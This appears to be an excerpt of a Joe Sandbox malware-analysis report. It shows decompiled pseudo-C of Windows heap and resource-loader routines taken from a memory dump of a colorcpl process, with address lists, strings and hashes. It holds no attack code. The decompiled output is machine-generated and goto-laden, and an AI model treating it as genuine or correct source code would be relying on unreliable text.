				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x4436d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x44391e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E04382BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E04405FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x443373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E04382B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E043FEFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E043FD646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E04405FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E0435096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E04405FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E04353C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E043FF1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E04353C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E043FF1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E0435036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E04405FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E04405FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x443432c; // 0x0
						_v24 = 0x443432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x04350689
0x0435068d
0x04350690
0x04350699
0x043506a3
0x04350929
0x00000000
0x04350929
0x043506b0
0x043a4e97
0x043a4e99
0x043a4e9f
0x043a4ea5
0x043a4ea9
0x043a4eca
0x043a4ecf
0x043a4eab
0x043a4ec0
0x043a4ec5
0x043a4ed7
0x043a4edc
0x043a4ee4
0x043a4eeb
0x043a4ef6
0x043a4ef6
0x043a4eeb
0x043a4e99
0x043506b6
0x043506b9
0x043506b9
0x043506be
0x04350921
0x043506c4
0x043506c4
0x043506c4
0x043506ca
0x043506d3
0x043506d9
0x043506dc
0x043a4f0a
0x043a4f10
0x043a4f13
0x00000000
0x043506e2
0x043506e2
0x043506f2
0x04350930
0x04350936
0x04350938
0x0435093e
0x0435093e
0x04350938
0x043506ff
0x043a4f1b
0x043a4f1d
0x043a4f22
0x043a4f29
0x043a4f2a
0x043a4f2c
0x043a4f2d
0x043a4f2f
0x043a4f34
0x043a4f36
0x043a4f39
0x043a4f44
0x043a4f4d
0x043a4f4f
0x043a4f54
0x043a4f5b
0x043a4f5b
0x00000000
0x043a4f5b
0x043a4f3b
0x043a4f3d
0x00000000
0x00000000
0x043a4f3f
0x043a4f42
0x00000000
0x00000000
0x00000000
0x04350705
0x04350705
0x0435070c
0x0435070e
0x04350724
0x04350727
0x0435072d
0x04350730
0x04350751
0x04350751
0x04350757
0x0435075c
0x0435075d
0x0435075f
0x04350760
0x04350762
0x04350767
0x0435076a
0x0435076a
0x04350770
0x04350772
0x043a4f9f
0x00000000
0x043a4f9f
0x0435077e
0x04350783
0x043a4faa
0x043a4fad
0x00000000
0x00000000
0x043a4fbc
0x0435078e
0x04350791
0x043a4fcc
0x043a4fd3
0x043a4fe2
0x043a4fe2
0x043a4fd3
0x0435079b
0x043507a0
0x043507a4
0x043507b0
0x043507b7
0x043a4fec
0x043a4ff1
0x043a4ff1
0x043507b7
0x043507bd
0x043507c1
0x043507c5
0x043507c8
0x043507cb
0x043507d0
0x043507d3
0x043507d3
0x043507d6
0x043a5008
0x043507e4
0x043507e4
0x043507e6
0x043507e6
0x043507e9
0x043507ee
0x0435081b
0x0435081b
0x0435081e
0x04350827
0x0435082d
0x04350833
0x04350839
0x0435083f
0x04350848
0x043508fd
0x04350903
0x04350903
0x0435084e
0x04350851
0x04350855
0x04350945
0x0435094d
0x04350950
0x04350953
0x04350964
0x00000000
0x04350964
0x04350955
0x00000000
0x0435085b
0x0435085b
0x0435086e
0x04350876
0x04350879
0x04350879
0x0435087c
0x04350880
0x04350885
0x043508dd
0x043508de
0x043508e1
0x043508e6
0x043508f3
0x043508f8
0x043508f8
0x04350887
0x04350887
0x04350887
0x04350889
0x04350892
0x04350897
0x043a505d
0x043a5060
0x00000000
0x00000000
0x043a506f
0x043508a2
0x043508a5
0x043a5079
0x043a507f
0x043a5086
0x00000000
0x00000000
0x043a5091
0x043a5093
0x043a50a5
0x043a5095
0x043a509e
0x043a509e
0x043a50af
0x043a50be
0x043508ae
0x043508b4
0x043508b9
0x043a50c8
0x043a50cb
0x00000000
0x00000000
0x043a50da
0x043508c4
0x043508c7
0x043a50e9
0x043a50eb
0x043a50fd
0x043a50ed
0x043a50f6
0x043a50f6
0x043a5113
0x043a5113
0x00000000
0x043508cd
0x043508bf
0x043508bf
0x00000000
0x043508bf
0x043508ab
0x043508ab
0x00000000
0x043508ab
0x0435089d
0x0435089d
0x00000000
0x0435089d
0x043507f0
0x043507f0
0x043507f8
0x043a5014
0x043a5017
0x043a501a
0x043a5036
0x043a503d
0x00000000
0x00000000
0x00000000
0x00000000
0x043a501c
0x043a501c
0x043a501c
0x043a501e
0x043a5020
0x043a5023
0x043a5026
0x00000000
0x00000000
0x043a5028
0x043a502b
0x043a502e
0x00000000
0x00000000
0x00000000
0x043a5030
0x043a5035
0x043a5035
0x00000000
0x043a5035
0x043507fe
0x043507fe
0x04350801
0x04350803
0x04350808
0x043a5053
0x04350816
0x04350816
0x04350818
0x04350818
0x00000000
0x04350808
0x043507ee
0x04350789
0x04350789
0x00000000
0x04350789
0x04350732
0x04350736
0x043a4f63
0x043a4f66
0x043a4f66
0x043a4f6b
0x043a4f6d
0x00000000
0x00000000
0x043a4f76
0x043a4f79
0x043a4f7b
0x043a4f8d
0x043a4f92
0x043a4f92
0x043a4f95
0x00000000
0x043a4f95
0x0435073c
0x04350742
0x0435074b
0x00000000
0x00000000
0x00000000
0x0435074b
0x043506ff

Strings

HEAP: , xrefs: 043A4ECA
HEAP[%wZ]: , xrefs: 043A4EBB
(UCRBlock->Size >= *Size), xrefs: 043A4ED7

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 45574f34710400cfe41be994cffbd8dd8d65fdca7b1561690c1bba275c08db86
Instruction ID: 750461297209b1393d7ef46ddfbdc2166b25cdc33d882b0ada59f96295f27244
Opcode Fuzzy Hash: 45574f34710400cfe41be994cffbd8dd8d65fdca7b1561690c1bba275c08db86
Instruction Fuzzy Hash: 0BF1AC70700A05EFEB18CF68C884F6AB7B5FF44304F1491A9E8169B6A1E775F991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043D3608 Relevance: 4.1, Strings: 3, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E043D3608(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t140;
				short _t141;
				signed char* _t146;
				char* _t147;
				signed char* _t149;
				intOrPtr _t150;
				signed short _t167;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t201;
				void* _t204;
				void* _t205;
				signed char* _t206;
				signed char* _t213;
				intOrPtr _t216;
				signed int _t217;
				intOrPtr* _t218;
				signed int _t220;
				short _t223;
				signed short _t230;
				char* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t245;
				void* _t258;
				intOrPtr _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				char* _t271;
				char* _t274;
				signed int _t275;
				void* _t279;
				void* _t280;

				_push(0x45c);
				_push(0x441cf20);
				E04397C40(__ebx, __edi, __esi);
				 *(_t280 - 0x430) = __edx;
				_t266 = __ecx;
				 *((intOrPtr*)(_t280 - 0x428)) = __ecx;
				 *((intOrPtr*)(_t280 - 0x440)) =  *((intOrPtr*)(_t280 + 8));
				 *((intOrPtr*)(_t280 - 0x450)) =  *((intOrPtr*)(_t280 + 0x10));
				 *((intOrPtr*)(_t280 - 0x44c)) =  *((intOrPtr*)(_t280 + 0x14));
				 *((intOrPtr*)(_t280 - 0x444)) =  *((intOrPtr*)(_t280 + 0x18));
				 *((intOrPtr*)(_t280 - 0x434)) =  *((intOrPtr*)(_t280 + 0x1c));
				_t223 = 0x42;
				 *((short*)(_t280 - 0x43c)) = _t223;
				_t140 = 0x44;
				 *((short*)(_t280 - 0x43a)) = _t140;
				 *(_t280 - 0x438) = L"LdrpResSearchResourceHandle Enter";
				_t141 = 0x40;
				 *((short*)(_t280 - 0x464)) = _t141;
				 *((short*)(_t280 - 0x462)) = _t223;
				 *(_t280 - 0x460) = L"LdrpResSearchResourceHandle Exit";
				_t271 = 0;
				E04388F40(_t280 - 0xc8, 0, _t141 + 0x6c);
				if(E04353C40() == 0) {
					_t146 = 0x7ffe0385;
				} else {
					_t146 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t146 & 0x00000001) == 0) {
					_t213 = 0x7ffe0384;
				} else {
					_t205 = E04353C40();
					_t213 = 0x7ffe0384;
					if(_t205 == 0) {
						_t206 = 0x7ffe0384;
					} else {
						_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					E043CFC01(_t280 - 0x43c,  *_t206 & 0x000000ff);
				}
				if(_t266 == 0 || _t266 == 0xffffffff) {
					_t267 = 0xc000000d;
					goto L16;
				} else {
					 *(_t280 - 0x42c) =  *(_t280 - 0x430) & 0x00001000;
					_t150 = E043D314A(_t266, _t280 - 0x45c);
					if(_t150 >= 0 ||  *(_t280 - 0x42c) == _t271) {
						_t150 = E043D3592(_t266, _t280 - 0x210, 0x40);
						if(_t150 >= 0) {
							if( *((intOrPtr*)(_t280 - 0x210)) == 0x5a4d) {
								_t269 =  *((intOrPtr*)(_t280 - 0x1d4));
								if( *(_t280 - 0x42c) == _t271) {
									L22:
									_t150 = E043D3592( *((intOrPtr*)(_t280 - 0x428)), _t280 - 0x1d0, 0x108);
									if(_t150 >= 0) {
										if( *((intOrPtr*)(_t280 - 0x1d0)) != 0x4550) {
											goto L15;
										} else {
											if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x10b) {
												if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x20b ||  *((intOrPtr*)(_t280 - 0x1cc)) != 0x200 &&  *((intOrPtr*)(_t280 - 0x1cc)) != 0x8664) {
													goto L15;
												} else {
													if( *((intOrPtr*)(_t280 - 0x14c)) <= 2 ||  *((intOrPtr*)(_t280 - 0x134)) == _t271) {
														goto L30;
													} else {
														_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
														if(_t230 == 0 || _t230 < 0x88) {
															goto L15;
														} else {
															_t216 =  *((intOrPtr*)(_t280 - 0x138));
															goto L43;
														}
													}
												}
											} else {
												_t245 = 0x14c;
												_t201 =  *((intOrPtr*)(_t280 - 0x1cc));
												if(_t201 == _t245 || _t201 == _t245 + 0x74 || _t201 == 0x1c2 || _t201 == 0x1c4) {
													if( *((intOrPtr*)(_t280 - 0x15c)) > 2) {
														if( *((intOrPtr*)(_t280 - 0x144)) == _t271) {
															goto L30;
														} else {
															_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
															if(_t230 == 0 || _t230 < 0x78) {
																goto L15;
															} else {
																_t216 =  *((intOrPtr*)(_t280 - 0x148));
																L43:
																if(_t216 != 0) {
																	_t167 =  *(_t280 - 0x1ca);
																	if(_t167 != 0) {
																		_t273 = (_t167 & 0x0000ffff) * 0x28;
																		if((_t230 & 0x0000ffff) + 0x18 + (_t167 & 0x0000ffff) * 0x28 + _t269 <=  *((intOrPtr*)(_t280 - 0x45c))) {
																			_t147 = E04355D90(_t230,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t273);
																			 *(_t280 - 0x420) = _t147;
																			 *(_t280 - 0x448) = _t147;
																			if(_t147 != 0) {
																				_t274 =  *(_t280 - 0x420);
																				_t267 = E043D3592( *((intOrPtr*)(_t280 - 0x428)), _t274, _t273);
																				 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																				if(_t267 < 0) {
																					L59:
																					_t147 =  *(_t280 - 0x420);
																					goto L60;
																				} else {
																					_t232 = _t274;
																					 *(_t280 - 0x438) = _t274;
																					_t258 = 0;
																					_t275 =  *(_t280 - 0x1ca) & 0x0000ffff;
																					if(_t275 != 0) {
																						while(_t216 < _t232[0xc] || _t216 >= _t232[0x10] + _t232[0xc]) {
																							_t232 =  &(_t232[0x28]);
																							_t258 = _t258 + 1;
																							if(_t258 < _t275) {
																								continue;
																							}
																							break;
																						}
																						 *(_t280 - 0x438) = _t232;
																					}
																					if(_t258 < _t275) {
																						_t278 = _t232[0x14] - _t232[0xc] + _t216;
																						if(_t232[0x14] - _t232[0xc] + _t216 == 0) {
																							goto L58;
																						} else {
																							_t217 =  *((intOrPtr*)(_t280 - 0x428));
																							_t267 = E043D3C37(_t217, _t278);
																							 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																							if(_t267 < 0) {
																								goto L59;
																							} else {
																								if( *((intOrPtr*)(_t280 + 0xc)) != 3) {
																									L73:
																									 *((short*)(_t280 - 0x424)) = 0;
																									_t260 = _t217;
																									_t267 = E0434E9A0(0, _t217,  *((intOrPtr*)(_t280 - 0x45c)), _t278, _t280 - 0x1d0,  *(_t280 - 0x438),  *((intOrPtr*)(_t280 - 0x440)),  *((intOrPtr*)(_t280 + 0xc)), _t280 - 0x418,  *((intOrPtr*)(_t280 - 0x450)),  *((intOrPtr*)(_t280 - 0x44c)),  *(_t280 - 0x430), _t280 - 0x424);
																									 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																									if(_t267 < 0) {
																										goto L59;
																									} else {
																										_t235 =  *((intOrPtr*)(_t280 - 0x434));
																										if(_t235 == 0) {
																											goto L59;
																										} else {
																											_t182 =  *((intOrPtr*)(_t280 - 0x424));
																											_t271 = 0;
																											if( *((intOrPtr*)(_t280 - 0x424)) != 0) {
																												 *((intOrPtr*)(_t280 - 0x468)) = _t280 - 0xc8;
																												 *((short*)(_t280 - 0x46a)) = 0xac;
																												_t267 = E04365A40(_t260, _t182 & 0x0000ffff, _t280 - 0x46c, 2, 0);
																												 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																												if(_t267 < 0) {
																													goto L85;
																												} else {
																													_t218 = _t280 - 0xc8;
																													_t239 = _t218 + 2;
																													do {
																														_t185 =  *_t218;
																														_t218 = _t218 + 2;
																													} while (_t185 != 0);
																													_t220 = _t218 - _t239 >> 1;
																													_t235 =  *((intOrPtr*)(_t280 - 0x434));
																													goto L81;
																												}
																											} else {
																												_t220 = 0;
																												L81:
																												 *(_t280 - 4) = _t271;
																												if(_t220 >=  *_t235) {
																													L84:
																													 *_t235 = _t220 + 1;
																													_t267 = 0xc0000023;
																													 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000023;
																													 *(_t280 - 4) = 0xfffffffe;
																													L85:
																													_t147 =  *(_t280 - 0x420);
																													goto L61;
																												} else {
																													_t187 =  *((intOrPtr*)(_t280 - 0x444));
																													if( *((intOrPtr*)(_t280 - 0x444)) == 0) {
																														goto L84;
																													} else {
																														_t279 = _t220 + _t220;
																														E043888C0(_t187, _t280 - 0xc8, _t279);
																														_t120 = _t220 + 1; // 0x1
																														 *((intOrPtr*)( *((intOrPtr*)(_t280 - 0x434)))) = _t120;
																														 *((short*)(_t279 +  *((intOrPtr*)(_t280 - 0x444)))) = 0;
																														 *(_t280 - 4) = 0xfffffffe;
																														goto L59;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									 *((short*)(_t280 - 0x418)) = 0;
																									_t193 =  *( *((intOrPtr*)(_t280 - 0x440)) + 8) & 0x0000ffff;
																									_t243 =  *(_t280 - 0x430);
																									if(( *(_t280 - 0x430) & 0x00000020) == 0) {
																										_t267 = E0434A2E0(0, 0, _t193, _t243, _t280 - 0x418);
																										 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																										if(_t267 >= 0 ||  *(_t280 - 0x42c) == 0) {
																											goto L73;
																										} else {
																											goto L59;
																										}
																									} else {
																										 *((short*)(_t280 - 0x418)) = 1;
																										 *((short*)(_t280 - 0x414)) = 0;
																										goto L73;
																									}
																								}
																							}
																						}
																						goto L93;
																					} else {
																						L58:
																						_t267 = 0xc000007b;
																						 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																						goto L59;
																					}
																				}
																			} else {
																				_t267 = 0xc0000017;
																				 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000017;
																				L60:
																				_t271 = 0;
																			}
																		} else {
																			_t271 = 0;
																			goto L46;
																		}
																	} else {
																		L46:
																		_t267 = 0xc000007b;
																		 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																		_t147 = _t271;
																	}
																	L61:
																	_t213 = 0x7ffe0384;
																	goto L62;
																} else {
																	_t150 = 0xc0000089;
																}
															}
														}
													} else {
														L30:
														_t267 = 0xc0000089;
														goto L16;
													}
												} else {
													goto L15;
												}
											}
										}
									}
								} else {
									if(E043394A3(_t269, 0xf8, _t280 - 0x448) < 0 || _t269 > 0x10000000) {
										goto L15;
									} else {
										_t204 = _t269 + 0xf8;
										if(_t204 <= _t269 || _t204 >=  *((intOrPtr*)(_t280 - 0x45c))) {
											goto L15;
										} else {
											goto L22;
										}
									}
								}
							} else {
								L15:
								_t267 = 0xc000007b;
								L16:
								 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
								_t147 = _t271;
								L62:
								if(_t147 != 0) {
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t271, _t147);
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(E04353C40() == 0) {
									_t149 = 0x7ffe0385;
								} else {
									_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(( *_t149 & 0x00000001) != 0) {
									if(E04353C40() != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										_t267 =  *((intOrPtr*)(_t280 - 0x41c));
									}
									E043CFC01(_t280 - 0x464,  *_t213 & 0x000000ff);
								}
								_t150 = _t267;
							}
						}
					}
				}
				L93:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0x10));
				return _t150;
			}

0x043d3608
0x043d360d
0x043d3612
0x043d3617
0x043d361d
0x043d361f
0x043d3628
0x043d3631
0x043d363a
0x043d3643
0x043d364c
0x043d3654
0x043d3655
0x043d365e
0x043d365f
0x043d3666
0x043d3672
0x043d3673
0x043d367a
0x043d3681
0x043d368f
0x043d3699
0x043d36a8
0x043d36ba
0x043d36aa
0x043d36b3
0x043d36b3
0x043d36c2
0x043d36f4
0x043d36c4
0x043d36c4
0x043d36c9
0x043d36d0
0x043d36e2
0x043d36d2
0x043d36db
0x043d36db
0x043d36ed
0x043d36ed
0x043d36fb
0x043d3be3
0x00000000
0x043d370a
0x043d3715
0x043d3723
0x043d372a
0x043d3745
0x043d374c
0x043d375e
0x043d3772
0x043d377e
0x043d37b1
0x043d37c5
0x043d37cc
0x043d37dc
0x00000000
0x043d37de
0x043d37ea
0x043d3862
0x00000000
0x043d3886
0x043d388d
0x00000000
0x043d3897
0x043d3897
0x043d38a1
0x00000000
0x043d38b5
0x043d38b5
0x00000000
0x043d38b5
0x043d38a1
0x043d388d
0x043d37ec
0x043d37ec
0x043d37ef
0x043d37f9
0x043d3820
0x043d3832
0x00000000
0x043d3834
0x043d3834
0x043d383e
0x00000000
0x043d384e
0x043d384e
0x043d38bb
0x043d38bd
0x043d38c9
0x043d38d3
0x043d38ea
0x043d38fd
0x043d390f
0x043d3914
0x043d391a
0x043d3922
0x043d3932
0x043d3950
0x043d3952
0x043d395a
0x043d399d
0x043d399d
0x00000000
0x043d395c
0x043d395c
0x043d395e
0x043d3964
0x043d3966
0x043d396f
0x043d3971
0x043d3980
0x043d3983
0x043d3986
0x00000000
0x00000000
0x00000000
0x043d3986
0x043d3988
0x043d3988
0x043d3990
0x043d39f0
0x043d39f2
0x00000000
0x043d39f4
0x043d39f6
0x043d3a03
0x043d3a05
0x043d3a0d
0x00000000
0x043d3a0f
0x043d3a13
0x043d3a73
0x043d3a75
0x043d3ab9
0x043d3ac2
0x043d3ac4
0x043d3acc
0x00000000
0x043d3ad2
0x043d3ad2
0x043d3ada
0x00000000
0x043d3ae0
0x043d3ae0
0x043d3ae7
0x043d3aec
0x043d3af8
0x043d3b03
0x043d3b1d
0x043d3b1f
0x043d3b27
0x00000000
0x043d3b29
0x043d3b29
0x043d3b2f
0x043d3b32
0x043d3b32
0x043d3b35
0x043d3b38
0x043d3b3f
0x043d3b41
0x00000000
0x043d3b41
0x043d3aee
0x043d3aee
0x043d3b47
0x043d3b47
0x043d3b4c
0x043d3b8f
0x043d3b92
0x043d3b94
0x043d3b99
0x043d3b9f
0x043d3ba6
0x043d3ba6
0x00000000
0x043d3b4e
0x043d3b4e
0x043d3b56
0x00000000
0x043d3b58
0x043d3b58
0x043d3b64
0x043d3b6c
0x043d3b75
0x043d3b7f
0x043d3b83
0x00000000
0x043d3b83
0x043d3b56
0x043d3b4c
0x043d3aec
0x043d3ada
0x043d3a15
0x043d3a17
0x043d3a24
0x043d3a28
0x043d3a31
0x043d3a5a
0x043d3a5c
0x043d3a64
0x00000000
0x00000000
0x00000000
0x00000000
0x043d3a33
0x043d3a36
0x043d3a3f
0x00000000
0x043d3a3f
0x043d3a31
0x043d3a13
0x043d3a0d
0x00000000
0x043d3992
0x043d3992
0x043d3992
0x043d3997
0x00000000
0x043d3997
0x043d3990
0x043d3924
0x043d3924
0x043d3929
0x043d39a3
0x043d39a3
0x043d39a3
0x043d38ff
0x043d38ff
0x00000000
0x043d38ff
0x043d38d5
0x043d38d5
0x043d38d5
0x043d38da
0x043d38e0
0x043d38e0
0x043d39a5
0x043d39a5
0x00000000
0x043d38bf
0x043d38bf
0x043d38bf
0x043d38bd
0x043d383e
0x043d3822
0x043d3822
0x043d3822
0x00000000
0x043d3822
0x00000000
0x00000000
0x00000000
0x043d37f9
0x043d37ea
0x043d37dc
0x043d3780
0x043d3795
0x00000000
0x043d379f
0x043d379f
0x043d37a7
